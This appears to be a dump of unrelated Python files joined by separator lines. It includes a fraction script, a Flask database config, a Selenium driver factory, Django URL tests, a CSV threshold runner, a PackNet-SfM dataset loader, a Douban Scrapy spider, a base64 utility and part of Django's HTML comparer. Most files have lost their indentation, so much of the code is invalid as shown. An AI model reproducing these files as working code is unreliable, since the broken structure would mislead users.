print(fracaoMista(inteiro, numerador, frac3.getDen()))
print()
frac1 = fracaoMista(3, 1, 2)
frac2 = fracaoMista(4, 2, 3)
frac3 = frac1.juntar() + frac2.juntar()
inteiro, numerador = separadorFrac(frac3)
print(fracaoMista(inteiro, numerador, frac3.getDen()))
|
python
|
# -*- coding:utf-8 -*-
# Database definitions
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cache import Cache
import memcache
import os
curdir = os.getcwd()
static_dir = curdir+'/static'
template_dir = curdir+'/templates'
app = Flask(__name__,static_folder=static_dir,template_folder=template_dir)
cacheClient = memcache.Client(servers=['127.0.0.1:11211'])
# dialect+driver://username:password@host:port/database?charset=utf8
# Configure the SQLAlchemy URI: driver://username:password@host:port/database?charset
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:[email protected]:3306/pss?charset=utf8'
# Initialization
db = SQLAlchemy(app)
cache = Cache(config={'CACHE_TYPE': 'memcached',
'CACHE_MEMCACHED_SERVERS':["127.0.0.1:11211"]})
cache.init_app(app)
|
python
|
SYMBOLS = \
[
# 1
'?', '!', '¿', '¡', ',', '.', '@', '#', '%', '&', '-',
'(', ')', '[', ']', ';', ':', '′', '‘', '’', '‚', '‛',
'\\', '/', '{', '}', '•', '…', '″', '“', '”', '„', '_',
'<', '>', '«', '»', '←', '→', '↑', '↓', '⇒', '⇔', '˜',
'$', '¢', '€', '£', '¥', '₽', '₩', '𝑓', '¤', '|', '^',
# 2
'ˊ', 'ˋ', '+', '-', '×', '÷', '=', '±', '∞', '√', '¬',
'∀', '⊂', '⊃', '∴', '∵', '⁀', 'μ', '№', '°', '′', '∂',
'¹', '²', '³', '¼', '½', '¾', '*', '♪', '♭', '♀', '♂',
'⚪', '⚫', '◎', '◻', '◼', '◇', '◆', '△', '▲', '▽', '▼',
'☆', '★', '♡', '♥', '©', '®', '™', '§', '¶', '†', '⍑',
# 3
'α', 'β', 'γ', 'δ', 'ε', 'ζ', 'η', 'θ', 'ι', 'κ', 'λ',
'μ', 'ν', 'ξ', 'ο', 'π', 'ρ', 'σ', 'τ', 'υ', 'φ', 'χ',
'ψ', 'ω',
# 4
'Α', 'Β', 'Γ', 'Δ', 'Ε', 'Ζ', 'Η', 'Θ', 'Ι', 'Κ', 'Λ',
'Μ', 'Ν', 'Ξ', 'Ο', 'Π', 'Ρ', 'Σ', 'Τ', 'Υ', 'Φ', 'Χ',
'Ψ', 'Ω',
]
SYMBOLS_REMOVED_DUPES = list(dict.fromkeys(SYMBOLS))
SYMBOLS_VALID_FOR_NAME_ONLY = [char for char in SYMBOLS_REMOVED_DUPES
                               if char not in {'%', '@', '\\', '₽', '₩', '♡', '♥'}]
|
python
|
"""
DriverFactory class
Note: Change this class as you add support for:
1. SauceLabs/BrowserStack
2. More browsers like Opera
"""
import dotenv,os,sys,requests,json
from datetime import datetime
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome import service
from selenium.webdriver.remote.webdriver import RemoteConnection
from conf import opera_browser_conf
class DriverFactory():
def __init__(self,browser='ff',browser_version=None,os_name=None):
"Constructor for the Driver factory"
self.browser=browser
self.browser_version=browser_version
self.os_name=os_name
def get_web_driver(self,remote_flag,os_name,os_version,browser,browser_version):
"Return the appropriate driver"
if (remote_flag.lower() == 'n'):
web_driver = self.run_local(os_name,os_version,browser,browser_version)
else:
print("DriverFactory does not know the browser: ",browser)
web_driver = None
return web_driver
def run_local(self,os_name,os_version,browser,browser_version):
"Return the local driver"
local_driver = None
if browser.lower() == "ff" or browser.lower() == 'firefox':
local_driver = webdriver.Firefox()
elif browser.lower() == "ie":
local_driver = webdriver.Ie()
elif browser.lower() == "chrome":
local_driver = webdriver.Chrome()
elif browser.lower() == "opera":
            try:
                opera_browser_location = opera_browser_conf.location
                options = webdriver.ChromeOptions()
                options.binary_location = opera_browser_location  # path to the Opera executable
                local_driver = webdriver.Opera(options=options)
            except Exception as e:
                print("\nException when trying to get the Opera webdriver in module: %s" % sys.modules[__name__])
print("Python says:%s"%str(e))
if 'no Opera binary' in str(e):
print("SOLUTION: It looks like you are trying to use Opera Browser. Please update Opera Browser location under conf/opera_browser_conf.\n")
elif browser.lower() == "safari":
local_driver = webdriver.Safari()
return local_driver
def get_firefox_driver(self):
"Return the Firefox driver"
driver = webdriver.Firefox(firefox_profile=self.get_firefox_profile())
return driver
def get_firefox_profile(self):
"Return a firefox profile"
return self.set_firefox_profile()
def set_firefox_profile(self):
"Setup firefox with the right preferences and return a profile"
try:
self.download_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),'..','downloads'))
if not os.path.exists(self.download_dir):
os.makedirs(self.download_dir)
except Exception as e:
print("Exception when trying to set directory structure")
print(str(e))
profile = webdriver.firefox.firefox_profile.FirefoxProfile()
set_pref = profile.set_preference
set_pref('browser.download.folderList', 2)
set_pref('browser.download.dir', self.download_dir)
set_pref('browser.download.useDownloadDir', True)
set_pref('browser.helperApps.alwaysAsk.force', False)
set_pref('browser.helperApps.neverAsk.openFile', 'text/csv,application/octet-stream,application/pdf')
set_pref('browser.helperApps.neverAsk.saveToDisk', 'text/csv,application/vnd.ms-excel,application/pdf,application/csv,application/octet-stream')
set_pref('plugin.disable_full_page_plugin_for_types', 'application/pdf')
set_pref('pdfjs.disabled',True)
return profile
|
python
|
from django.test import TestCase
from django.urls import reverse, resolve
from media_server.views import (
VideoListCreateView,
VideoRetrieveUpdateDestroyView,
GenreListCreateView,
GenreRetrieveUpdateDestroyView
)
class VideoListCreateViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('video_list_create')
self.assertEqual(resolve(url).func.view_class, VideoListCreateView)
class VideoRetrieveUpdateDestroyViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('video_read_update_delete', kwargs={'slug': 'video-1'})
self.assertEqual(resolve(url).func.view_class, VideoRetrieveUpdateDestroyView)
class GenreListCreateViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('genre_list_create')
self.assertEqual(resolve(url).func.view_class, GenreListCreateView)
class GenreRetrieveUpdateDestroyViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('genre_read_update_delete', kwargs={'slug': 'genre-1'})
self.assertEqual(resolve(url).func.view_class, GenreRetrieveUpdateDestroyView)
|
python
|
# Copyright (C) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
#
#
# SPDX-License-Identifier: Apache-2.0
import logging
from os.path import splitext
from collections import defaultdict
from wca.runners import Runner
from prm.model_distribution.metric import Metric
from prm.model_distribution.model import DistriModel
from prm.model_distribution.db import ModelDatabase, DatabaseError
from prm.analyze.analyzer import ThreshType
from wca.config import Path
import pandas as pd
log = logging.getLogger(__name__)
class ImproperCSVFilePath(Exception):
"""
Improper CSV file path
"""
pass
class ImproperCSVFileColumns(Exception):
"""
Improper CSV file columns
"""
pass
class BuildRunnerCSV(Runner):
"""
Using CSV data to build model thresholds and store them in zookeeper.
Arguments:
file_path: the file_path of the csv file
database: model storage database, get/set api is provided
model: threshold analyzer
"""
def __init__(
self,
file_path: Path,
database: ModelDatabase,
model: DistriModel,
):
self._file_path = file_path
self._model = model
self._database = database
self._finish = False
self.default_columns = {Metric.NAME, Metric.CPU_MODEL,
Metric.VCPU_COUNT, Metric.MB,
Metric.CPI, Metric.L3MPKI,
Metric.NF, Metric.UTIL, Metric.MSPKI}
def _initialize(self):
"""Three-level nested dict example:
{
cpu_model1:{
application1:{
cpu_assignment1:{
threshold}
}
}
}
"""
if splitext(self._file_path)[1] != '.csv':
raise ImproperCSVFilePath("Please provide a csv file path.")
# initialize a three-level nested dict
self.target = defaultdict(lambda: defaultdict(dict))
def run(self) -> int:
log.info('model-distribution runner is started!')
self._initialize()
while True:
self._iterate()
if self._finish:
break
return 0
def _iterate(self):
df = pd.read_csv(self._file_path)
if not self.default_columns.issubset(set(df.columns)):
raise ImproperCSVFileColumns("The csv's columns {} and default "
"columns {} do not match".format(
set(df.columns),
self.default_columns))
model_keys = df.groupby([Metric.CPU_MODEL, Metric.NAME, Metric.VCPU_COUNT]).groups.keys()
for model_key in model_keys:
# filter dataframe by cpu_model, application, cpu_assignment
if any(str(v) == 'nan' for v in model_key):
continue
dataframe = df[(df[Metric.CPU_MODEL] == model_key[0]) &
(df[Metric.NAME] == model_key[1]) &
(df[Metric.VCPU_COUNT] == model_key[2])]
cpu_number = model_key[2]
tdp_thresh, thresholds = self._model.build_model(dataframe, cpu_number)
value = {ThreshType.TDP.value: tdp_thresh, ThreshType.METRICS.value: thresholds}
self.target[model_key[0]][model_key[1]][model_key[2]] = value
self._store_database(self.target)
self._finish = True
def _store_database(self, target):
for key, value in target.items():
try:
self._database.set(key, dict(value))
except DatabaseError as e:
log.error("failed to set key-value to the database: {}".format(e))
|
python
|
# Copyright 2020 Toyota Research Institute. All rights reserved.
import os
import torch
import numpy as np
from dgp.datasets.synchronized_dataset import SynchronizedSceneDataset
from dgp.utils.camera import Camera, generate_depth_map
from dgp.utils.geometry import Pose
from packnet_sfm.geometry.pose_utils import invert_pose_numpy
from packnet_sfm.utils.misc import make_list
from packnet_sfm.utils.types import is_tensor, is_numpy, is_list, is_str
cam_left_dict = {
'1': '5',
'5': '7',
'6': '1',
'7': '9',
'8': '6',
'9': '8',
}
cam_right_dict = {
'1': '6',
'5': '1',
'6': '8',
'7': '5',
'8': '9',
'9': '7',
}
########################################################################################################################
#### FUNCTIONS
########################################################################################################################
def stack_sample(sample):
"""Stack a sample from multiple sensors"""
# If there is only one sensor don't do anything
if len(sample) == 1:
return sample[0]
# Otherwise, stack sample
stacked_sample = {}
for key in sample[0]:
# Global keys (do not stack)
if key in ['idx', 'dataset_idx']:#['idx', 'dataset_idx', 'sensor_name', 'filename']:
stacked_sample[key] = sample[0][key]
else:
            # Keep strings as a list (one entry per sensor)
            if is_str(sample[0][key]):
                stacked_sample[key] = [s[key] for s in sample]
            # Stack torch tensors
            elif is_tensor(sample[0][key]):
                stacked_sample[key] = torch.stack([s[key] for s in sample], 0)
# Stack numpy arrays
elif is_numpy(sample[0][key]):
stacked_sample[key] = np.stack([s[key] for s in sample], 0)
# Stack list
elif is_list(sample[0][key]):
stacked_sample[key] = []
if is_str(sample[0][key][0]):
for i in range(len(sample)):
stacked_sample[key].append(sample[i][key])
# Stack list of torch tensors
if is_tensor(sample[0][key][0]):
for i in range(len(sample[0][key])):
stacked_sample[key].append(
torch.stack([s[key][i] for s in sample], 0))
# Stack list of numpy arrays
if is_numpy(sample[0][key][0]):
for i in range(len(sample[0][key])):
stacked_sample[key].append(
np.stack([s[key][i] for s in sample], 0))
# Return stacked sample
return stacked_sample
########################################################################################################################
#### DATASET
########################################################################################################################
class DGPvaleoDataset:
"""
DGP dataset class
Parameters
----------
path : str
Path to the dataset
split : str {'train', 'val', 'test'}
Which dataset split to use
cameras : list of str
Which cameras to get information from
depth_type : str
Which lidar will be used to generate ground-truth information
with_pose : bool
If enabled pose estimates are also returned
with_semantic : bool
If enabled semantic estimates are also returned
back_context : int
Size of the backward context
forward_context : int
Size of the forward context
data_transform : Function
Transformations applied to the sample
"""
def __init__(self, path, split,
cameras=None,
depth_type=None,
with_pose=False,
with_semantic=False,
back_context=0,
forward_context=0,
data_transform=None,
with_geometric_context=False,
):
self.path = path
self.split = split
self.dataset_idx = 0
self.bwd = back_context
self.fwd = forward_context
self.has_context = back_context + forward_context > 0
self.with_geometric_context = with_geometric_context
self.num_cameras = len(cameras)
self.data_transform = data_transform
self.depth_type = depth_type
self.with_depth = depth_type is not None
self.with_pose = with_pose
self.with_semantic = with_semantic
# arrange cameras alphabetically
cameras = sorted(cameras)
cameras_left = list(cameras)
cameras_right = list(cameras)
for i_cam in range(self.num_cameras):
replaced = False
for k in cam_left_dict:
if not replaced and k in cameras_left[i_cam]:
cameras_left[i_cam] = cameras_left[i_cam].replace(k, cam_left_dict[k])
replaced = True
replaced = False
for k in cam_right_dict:
if not replaced and k in cameras_right[i_cam]:
cameras_right[i_cam] = cameras_right[i_cam].replace(k, cam_right_dict[k])
replaced = True
print(cameras)
print(cameras_left)
print(cameras_right)
# arrange cameras left and right and extract sorting indices
self.cameras_left_sort_idxs = list(np.argsort(cameras_left))
self.cameras_right_sort_idxs = list(np.argsort(cameras_right))
cameras_left_sorted = sorted(cameras_left)
cameras_right_sorted = sorted(cameras_right)
self.dataset = SynchronizedSceneDataset(path,
split=split,
datum_names=cameras,
backward_context=back_context,
forward_context=forward_context,
requested_annotations=None,
only_annotated_datums=False,
)
if self.with_geometric_context:
self.dataset_left = SynchronizedSceneDataset(path,
split=split,
datum_names=cameras_left_sorted,
backward_context=back_context,
forward_context=forward_context,
requested_annotations=None,
only_annotated_datums=False,
)
self.dataset_right = SynchronizedSceneDataset(path,
split=split,
datum_names=cameras_right_sorted,
backward_context=back_context,
forward_context=forward_context,
requested_annotations=None,
only_annotated_datums=False,
)
@staticmethod
def _get_base_folder(image_file):
"""The base folder"""
return '/'.join(image_file.split('/')[:-4])
@staticmethod
def _get_sequence_name(image_file):
"""Returns a sequence name like '20180227_185324'."""
return image_file.split('/')[-4]
@staticmethod
def _get_camera_name(image_file):
"""Returns 'cam_i', i between 0 and 4"""
return image_file.split('/')[-2]
def _get_path_to_ego_mask(self, image_file):
"""Get the current folder from image_file."""
return os.path.join(self._get_base_folder(image_file),
self._get_sequence_name(image_file),
'semantic_masks',
self._get_camera_name(image_file) + '.npy')
def generate_depth_map(self, sample_idx, datum_idx, filename):
"""
Generates the depth map for a camera by projecting LiDAR information.
It also caches the depth map following DGP folder structure, so it's not recalculated
Parameters
----------
sample_idx : int
sample index
datum_idx : int
Datum index
filename :
Filename used for loading / saving
Returns
-------
depth : np.array [H, W]
Depth map for that datum in that sample
"""
# Generate depth filename
filename = '{}/{}.npz'.format(
os.path.dirname(self.path), filename.format('depth/{}'.format(self.depth_type)))
# Load and return if exists
if os.path.exists(filename):
return np.load(filename, allow_pickle=True)['depth']
# Otherwise, create, save and return
else:
# Get pointcloud
scene_idx, sample_idx_in_scene, _ = self.dataset.dataset_item_index[sample_idx]
pc_datum_idx_in_sample = self.dataset.get_datum_index_for_datum_name(
scene_idx, sample_idx_in_scene, self.depth_type)
pc_datum_data = self.dataset.get_point_cloud_from_datum(
scene_idx, sample_idx_in_scene, pc_datum_idx_in_sample)
# Create camera
camera_rgb = self.get_current('rgb', datum_idx)
camera_pose = self.get_current('pose', datum_idx)
camera_intrinsics = self.get_current('intrinsics', datum_idx)
camera = Camera(K=camera_intrinsics, p_cw=camera_pose.inverse())
# Generate depth map
world_points = pc_datum_data['pose'] * pc_datum_data['point_cloud']
depth = generate_depth_map(camera, world_points, camera_rgb.size[::-1])
# Save depth map
os.makedirs(os.path.dirname(filename), exist_ok=True)
np.savez_compressed(filename, depth=depth)
# Return depth map
return depth
def get_current(self, key, sensor_idx):
"""Return current timestep of a key from a sensor"""
return self.sample_dgp[self.bwd][sensor_idx][key]
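    # Index sketch (as implied by get_backward/get_forward below): the DGP sample
    # list is ordered [t-bwd, ..., t-1, t, t+1, ..., t+fwd], so with bwd=2 and
    # fwd=1 the current timestep sits at index self.bwd == 2.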
def get_current_left(self, key, sensor_idx):
"""Return current timestep of a key from a sensor"""
return self.sample_dgp_left[self.bwd][sensor_idx][key]
def get_current_right(self, key, sensor_idx):
"""Return current timestep of a key from a sensor"""
return self.sample_dgp_right[self.bwd][sensor_idx][key]
def get_backward(self, key, sensor_idx):
"""Return backward timesteps of a key from a sensor"""
return [] if self.bwd == 0 else \
[self.sample_dgp[i][sensor_idx][key] \
for i in range(0, self.bwd)]
def get_backward_left(self, key, sensor_idx):
"""Return backward timesteps of a key from a sensor"""
return [] if self.bwd == 0 else \
[self.sample_dgp_left[i][sensor_idx][key] \
for i in range(0, self.bwd)]
def get_backward_right(self, key, sensor_idx):
"""Return backward timesteps of a key from a sensor"""
return [] if self.bwd == 0 else \
[self.sample_dgp_right[i][sensor_idx][key] \
for i in range(0, self.bwd)]
def get_forward(self, key, sensor_idx):
"""Return forward timestep of a key from a sensor"""
return [] if self.fwd == 0 else \
[self.sample_dgp[i][sensor_idx][key] \
for i in range(self.bwd + 1, self.bwd + self.fwd + 1)]
def get_forward_left(self, key, sensor_idx):
"""Return forward timestep of a key from a sensor"""
return [] if self.fwd == 0 else \
[self.sample_dgp_left[i][sensor_idx][key] \
for i in range(self.bwd + 1, self.bwd + self.fwd + 1)]
def get_forward_right(self, key, sensor_idx):
"""Return forward timestep of a key from a sensor"""
return [] if self.fwd == 0 else \
[self.sample_dgp_right[i][sensor_idx][key] \
for i in range(self.bwd + 1, self.bwd + self.fwd + 1)]
def get_context(self, key, sensor_idx):
"""Get both backward and forward contexts"""
return self.get_backward(key, sensor_idx) + self.get_forward(key, sensor_idx)
def get_context_left(self, key, sensor_idx):
"""Get both backward and forward contexts"""
return self.get_backward_left(key, sensor_idx) + self.get_forward_left(key, sensor_idx)
def get_context_right(self, key, sensor_idx):
"""Get both backward and forward contexts"""
return self.get_backward_right(key, sensor_idx) + self.get_forward_right(key, sensor_idx)
def get_filename(self, sample_idx, datum_idx):
"""
Returns the filename for an index, following DGP structure
Parameters
----------
sample_idx : int
Sample index
datum_idx : int
Datum index
Returns
-------
filename : str
Filename for the datum in that sample
"""
scene_idx, sample_idx_in_scene, datum_indices = self.dataset.dataset_item_index[sample_idx]
scene_dir = self.dataset.get_scene_directory(scene_idx)
filename = self.dataset.get_datum(
scene_idx, sample_idx_in_scene, datum_indices[datum_idx]).datum.image.filename
return os.path.splitext(os.path.join(os.path.basename(scene_dir),
filename.replace('rgb', '{}')))[0]
def get_filename_left(self, sample_idx, datum_idx):
"""
Returns the filename for an index, following DGP structure
Parameters
----------
sample_idx : int
Sample index
datum_idx : int
Datum index
Returns
-------
filename : str
Filename for the datum in that sample
"""
scene_idx, sample_idx_in_scene, datum_indices = self.dataset_left.dataset_item_index[sample_idx]
scene_dir = self.dataset_left.get_scene_directory(scene_idx)
filename = self.dataset_left.get_datum(
scene_idx, sample_idx_in_scene, datum_indices[datum_idx]).datum.image.filename
return os.path.splitext(os.path.join(os.path.basename(scene_dir),
filename.replace('rgb', '{}')))[0]
def get_filename_right(self, sample_idx, datum_idx):
"""
Returns the filename for an index, following DGP structure
Parameters
----------
sample_idx : int
Sample index
datum_idx : int
Datum index
Returns
-------
filename : str
Filename for the datum in that sample
"""
scene_idx, sample_idx_in_scene, datum_indices = self.dataset_right.dataset_item_index[sample_idx]
scene_dir = self.dataset_right.get_scene_directory(scene_idx)
filename = self.dataset_right.get_datum(
scene_idx, sample_idx_in_scene, datum_indices[datum_idx]).datum.image.filename
return os.path.splitext(os.path.join(os.path.basename(scene_dir),
filename.replace('rgb', '{}')))[0]
def get_camera_idx_left(self, camera_idx):
return self.cameras_left_sort_idxs[camera_idx]
def get_camera_idx_right(self, camera_idx):
return self.cameras_right_sort_idxs[camera_idx]
def __len__(self):
"""Length of dataset"""
return len(self.dataset)
def __getitem__(self, idx):
"""Get a dataset sample"""
# Get DGP sample (if single sensor, make it a list)
self.sample_dgp = self.dataset[idx]
self.sample_dgp = [make_list(sample) for sample in self.sample_dgp]
if self.with_geometric_context:
self.sample_dgp_left = self.dataset_left[idx]
self.sample_dgp_left = [make_list(sample) for sample in self.sample_dgp_left]
self.sample_dgp_right = self.dataset_right[idx]
self.sample_dgp_right = [make_list(sample) for sample in self.sample_dgp_right]
# print('self.sample_dgp :')
# print(self.sample_dgp)
# print('self.sample_dgp_left :')
# print(self.sample_dgp_left)
# print('self.sample_dgp_right :')
# print(self.sample_dgp_right)
# Loop over all cameras
sample = []
for i in range(self.num_cameras):
i_left = self.get_camera_idx_left(i)
i_right = self.get_camera_idx_right(i)
# print(self.get_current('datum_name', i))
# print(self.get_filename(idx, i))
# print(self.get_current('intrinsics', i))
# print(self.with_depth)
data = {
'idx': idx,
'dataset_idx': self.dataset_idx,
'sensor_name': self.get_current('datum_name', i),
#
'filename': self.get_filename(idx, i),
'splitname': '%s_%010d' % (self.split, idx),
#
'rgb': self.get_current('rgb', i),
'intrinsics': self.get_current('intrinsics', i),
'extrinsics': self.get_current('extrinsics', i).matrix,
'path_to_ego_mask': os.path.join(os.path.dirname(self.path), self._get_path_to_ego_mask(self.get_filename(idx, i))),
}
# If depth is returned
if self.with_depth:
data.update({
'depth': self.generate_depth_map(idx, i, data['filename'])
})
# If pose is returned
if self.with_pose:
data.update({
'pose': self.get_current('pose', i).matrix,
})
if self.has_context:
orig_extrinsics = Pose.from_matrix(data['extrinsics'])
data.update({
'rgb_context': self.get_context('rgb', i),
'intrinsics_context': self.get_context('intrinsics', i),
'extrinsics_context':
[(extrinsics.inverse() * orig_extrinsics).matrix
for extrinsics in self.get_context('extrinsics', i)],
})
data.update({
'path_to_ego_mask_context': [os.path.join(os.path.dirname(self.path), self._get_path_to_ego_mask(self.get_filename(idx, i)))
for _ in range(len(data['rgb_context']))],
})
data.update({
'context_type': [],
})
for _ in range(self.bwd):
data['context_type'].append('backward')
for _ in range(self.fwd):
data['context_type'].append('forward')
# If context pose is returned
if self.with_pose:
# Get original values to calculate relative motion
orig_pose = Pose.from_matrix(data['pose'])
data.update({
'pose_context':
[(orig_pose.inverse() * pose).matrix
for pose in self.get_context('pose', i)],
})
if self.with_geometric_context:
orig_extrinsics = data['extrinsics']
#orig_extrinsics[:3,3] = -np.dot(orig_extrinsics[:3,:3].transpose(), orig_extrinsics[:3,3])
orig_extrinsics_left = self.get_current_left('extrinsics', i_left).matrix
orig_extrinsics_right = self.get_current_right('extrinsics', i_right).matrix
#orig_extrinsics_left[:3,3] = -np.dot(orig_extrinsics_left[:3,:3].transpose(), orig_extrinsics_left[:3,3])
#orig_extrinsics_right[:3,3] = -np.dot(orig_extrinsics_right[:3,:3].transpose(), orig_extrinsics_right[:3,3])
orig_extrinsics = Pose.from_matrix(orig_extrinsics)
orig_extrinsics_left = Pose.from_matrix(orig_extrinsics_left)
orig_extrinsics_right = Pose.from_matrix(orig_extrinsics_right)
data['rgb_context'].append(self.get_current_left('rgb', i_left))
data['rgb_context'].append(self.get_current_right('rgb', i_right))
data['intrinsics_context'].append(self.get_current_left('intrinsics', i_left))
data['intrinsics_context'].append(self.get_current_right('intrinsics', i_right))
data['extrinsics_context'].append((orig_extrinsics_left.inverse() * orig_extrinsics).matrix)
data['extrinsics_context'].append((orig_extrinsics_right.inverse() * orig_extrinsics).matrix)
#data['extrinsics_context'].append((orig_extrinsics.inverse() * orig_extrinsics_left).matrix)
#data['extrinsics_context'].append((orig_extrinsics.inverse() * orig_extrinsics_right).matrix)
data['path_to_ego_mask_context'].append(os.path.join(os.path.dirname(self.path),
self._get_path_to_ego_mask(self.get_filename_left(idx, i_left))))
data['path_to_ego_mask_context'].append(os.path.join(os.path.dirname(self.path),
self._get_path_to_ego_mask(self.get_filename_right(idx, i_right))))
data['context_type'].append('left')
data['context_type'].append('right')
data.update({
'sensor_name_left': self.get_current_left('datum_name', i_left),
'sensor_name_right': self.get_current_right('datum_name', i_right),
#
'filename_left': self.get_filename_left(idx, i_left),
'filename_right': self.get_filename_right(idx, i_right),
#
#'rgb_left': self.get_current_left('rgb', i),
#'rgb_right': self.get_current_right('rgb', i),
#'intrinsics_left': self.get_current_left('intrinsics', i),
#'intrinsics_right': self.get_current_right('intrinsics', i),
#'extrinsics_left': self.get_current_left('extrinsics', i).matrix,
#'extrinsics_right': self.get_current_right('extrinsics', i).matrix,
#'path_to_ego_mask_left': self._get_path_to_ego_mask(self.get_filename_left(idx, i)),
#'path_to_ego_mask_right': self._get_path_to_ego_mask(self.get_filename_right(idx, i)),
})
# data.update({
# 'extrinsics_context_left':
# [(orig_extrinsics_left.inverse() * extrinsics_left).matrix
# for extrinsics_left in self.get_context_left('extrinsics', i)],
# 'extrinsics_context_right':
# [(orig_extrinsics_right.inverse() * extrinsics_right).matrix
# for extrinsics_right in self.get_context_right('extrinsics', i)],
# 'intrinsics_context_left': self.get_context_left('intrinsics', i),
# 'intrinsics_context_right': self.get_context_right('intrinsics', i),
# })
sample.append(data)
# Apply same data transformations for all sensors
if self.data_transform:
sample = [self.data_transform(smp) for smp in sample]
# Return sample (stacked if necessary)
return stack_sample(sample)
########################################################################################################################
|
python
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.http import Request
from scrapy.selector import Selector
from scrapy_doubanmovie.scrapy_doubanmovie.items import ScrapyDoubanmovieItem
from urllib.parse import urljoin
# Generated with: scrapy genspider douban_spider movie.douban.com
class DoubanSpiderSpider(scrapy.Spider):
    # spider name
    name = 'douban_spider'
    # allowed domains
    allowed_domains = ['movie.douban.com']
    # entry URLs handed to the scheduler
    start_urls = ['https://movie.douban.com/top250']
def parse(self, response):
item = ScrapyDoubanmovieItem()
selector = Selector(response)
Movies = selector.xpath('//div[@class="info"]')
for eachMovie in Movies:
            title = eachMovie.xpath('div[@class="hd"]/a/span/text()').extract()  # the title is split across several span tags
            fullTitle = "".join(title)  # join the pieces into a single string
introduce = eachMovie.xpath('div[@class="bd"]/p/text()').extract()
star = eachMovie.xpath('div[@class="bd"]/div[@class="star"]/span/text()').extract()[0]
evaluate = eachMovie.xpath('div[@class="bd"]/div[@class="star"]/span/text()').extract()[1]
quote = eachMovie.xpath('div[@class="bd"]/p[@class="quote"]/span/text()').extract()
            # quote may be empty, so check before indexing
if quote:
quote = quote[0]
else:
quote = ''
item['title'] = fullTitle
item['introduce'] = ';'.join([x.strip() for x in introduce if x.strip() != ''])
item['star'] = star
item['evaluate'] = evaluate
item['quote'] = quote
yield item
nextLink = selector.xpath('//span[@class="next"]/link/@href').extract()
        # page 10 is the last page and has no "next" link
if nextLink:
nextLink = nextLink[0]
yield Request(urljoin(response.url, nextLink), callback=self.parse)
|
python
|
from base64 import b64encode, b64decode
from random import randint
class UtilityService:
@staticmethod
def decode_bytes(s):
return b64decode(s).decode('utf-8')
@staticmethod
def encode_string(s):
return str(b64encode(s.encode()), 'utf-8')
@staticmethod
def jitter(fraction):
i = fraction.split('/')
return randint(int(i[0]), int(i[1]))
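    # Example (sketch): jitter('30/60') returns a random integer between 30 and 60
    # inclusive, e.g. usable as a randomized delay in seconds.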
|
python
|
"""Compare two HTML documents."""
from html.parser import HTMLParser
from django.utils.regex_helper import _lazy_re_compile
# ASCII whitespace is U+0009 TAB, U+000A LF, U+000C FF, U+000D CR, or U+0020
# SPACE.
# https://infra.spec.whatwg.org/#ascii-whitespace
ASCII_WHITESPACE = _lazy_re_compile(r'[\t\n\f\r ]+')
def normalize_whitespace(string):
return ASCII_WHITESPACE.sub(' ', string)
class Element:
def __init__(self, name, attributes):
self.name = name
self.attributes = sorted(attributes)
self.children = []
def append(self, element):
if isinstance(element, str):
element = normalize_whitespace(element)
if self.children and isinstance(self.children[-1], str):
self.children[-1] += element
self.children[-1] = normalize_whitespace(self.children[-1])
return
elif self.children:
# removing last children if it is only whitespace
# this can result in incorrect dom representations since
# whitespace between inline tags like <span> is significant
if isinstance(self.children[-1], str) and self.children[-1].isspace():
self.children.pop()
if element:
self.children.append(element)
def finalize(self):
def rstrip_last_element(children):
if children and isinstance(children[-1], str):
children[-1] = children[-1].rstrip()
if not children[-1]:
children.pop()
children = rstrip_last_element(children)
return children
rstrip_last_element(self.children)
for i, child in enumerate(self.children):
if isinstance(child, str):
self.children[i] = child.strip()
elif hasattr(child, 'finalize'):
child.finalize()
def __eq__(self, element):
if not hasattr(element, 'name') or self.name != element.name:
return False
if len(self.attributes) != len(element.attributes):
return False
if self.attributes != element.attributes:
# attributes without a value is same as attribute with value that
# equals the attributes name:
# <input checked> == <input checked="checked">
for i in range(len(self.attributes)):
attr, value = self.attributes[i]
other_attr, other_value = element.attributes[i]
if value is None:
value = attr
if other_value is None:
other_value = other_attr
if attr != other_attr or value != other_value:
return False
return self.children == element.children
def __hash__(self):
return hash((self.name, *self.attributes))
def _count(self, element, count=True):
if not isinstance(element, str) and self == element:
return 1
if isinstance(element, RootElement) and self.children == element.children:
return 1
i = 0
elem_child_idx = 0
for child in self.children:
# child is text content and element is also text content, then
# make a simple "text" in "text"
if isinstance(child, str):
if isinstance(element, str):
if count:
i += child.count(element)
elif element in child:
return 1
else:
# Look for element wholly within this child.
i += child._count(element, count=count)
if not count and i:
return i
# Also look for a sequence of element's children among self's
# children. self.children == element.children is tested above,
# but will fail if self has additional children. Ex: '<a/><b/>'
# is contained in '<a/><b/><c/>'.
if isinstance(element, RootElement) and element.children:
elem_child = element.children[elem_child_idx]
# Start or continue match, advance index.
if elem_child == child:
elem_child_idx += 1
# Match found, reset index.
if elem_child_idx == len(element.children):
i += 1
elem_child_idx = 0
# No match, reset index.
else:
elem_child_idx = 0
return i
def __contains__(self, element):
return self._count(element, count=False) > 0
def count(self, element):
return self._count(element, count=True)
def __getitem__(self, key):
return self.children[key]
def __str__(self):
output = '<%s' % self.name
for key, value in self.attributes:
if value:
output += ' %s="%s"' % (key, value)
else:
output += ' %s' % key
if self.children:
output += '>\n'
output += ''.join(str(c) for c in self.children)
output += '\n</%s>' % self.name
else:
output += '>'
return output
def __repr__(self):
return str(self)
class RootElement(Element):
def __init__(self):
super().__init__(None, ())
def __str__(self):
return ''.join(str(c) for c in self.children)
class HTMLParseError(Exception):
pass
class Parser(HTMLParser):
# https://html.spec.whatwg.org/#void-elements
SELF_CLOSING_TAGS = {
